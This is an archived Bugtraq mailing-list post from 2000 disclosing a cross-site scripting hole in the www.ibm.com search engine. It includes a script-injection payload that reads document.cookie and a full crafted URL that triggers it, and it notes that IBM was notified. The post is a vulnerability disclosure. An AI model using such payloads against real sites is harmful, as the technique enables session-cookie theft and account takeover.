[17450] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Lame cross site scripting against www.ibm.com

daemon@ATHENA.MIT.EDU (Georgi Guninski)
Wed Nov 1 22:06:38 2000

MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Message-ID:  <39FD9ADD.A3431300@guninski.com>
Date:         Mon, 30 Oct 2000 17:59:25 +0200
Reply-To: Georgi Guninski <guninski@GUNINSKI.COM>
From: Georgi Guninski <guninski@GUNINSKI.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

I know this is really lame issue but guess more sites suffer from it.
The search engine at http://www.ibm.com allows cross site scripting.
Try searching for:
+IBM -</TITLE><SCRIPT>alert(document.cookie)</SCRIPT>
or try the following url:
http://www.ibm.com/Search?q=%2BIBM+-%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E&realm=All+of+IBM&v=10&lang=en&cc=us&Go.x=6&Go.y=14

At least it seems not to allow SSI.

Vendor status:
IBM was notified at least 4 days ago.

Regards,
Georgi Guninski


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[17450] in bugtraq

Lame cross site scripting against www.ibm.com

daemon@ATHENA.MIT.EDU (Georgi Guninski)Wed Nov 1 22:06:38 2000

daemon@ATHENA.MIT.EDU (Georgi Guninski)
Wed Nov 1 22:06:38 2000